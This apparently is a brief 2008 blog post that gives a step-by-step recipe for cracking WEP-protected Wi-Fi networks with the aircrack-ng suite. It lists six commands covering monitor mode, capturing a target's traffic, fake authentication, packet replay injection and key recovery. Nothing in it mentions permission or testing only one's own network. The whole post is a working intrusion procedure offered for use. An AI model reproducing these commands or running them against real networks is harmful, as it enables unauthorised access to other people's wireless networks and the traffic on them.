Sunday, November 23, 2008

Hack WEP Wireless

  1. Install aircrack:
    sudo apt-get install aircrack-ng
  2. Activate monitoring modus:
    sudo airmon-ng start wlan0 [channel]
  3. Do the scanning:
    sudo airodump-ng -c [channel] --bssid [mac_address_target] -w output wlan0
  4. Do fake authentification:
    sudo aireplay-ng -1 30 -e [ssid] -a [mac_address_target] -h [mac_address] wlan0
  5. To speed up packet gathering:
    sudo aireplay-ng -3 -b [mac_address_target] -h [mac_address] -x 900 wlan0
  6. To get the key:
    sudo aircrack-ng -z -b [mac_address_target] output*.cap

0 Comments:

Post a Comment

<< Home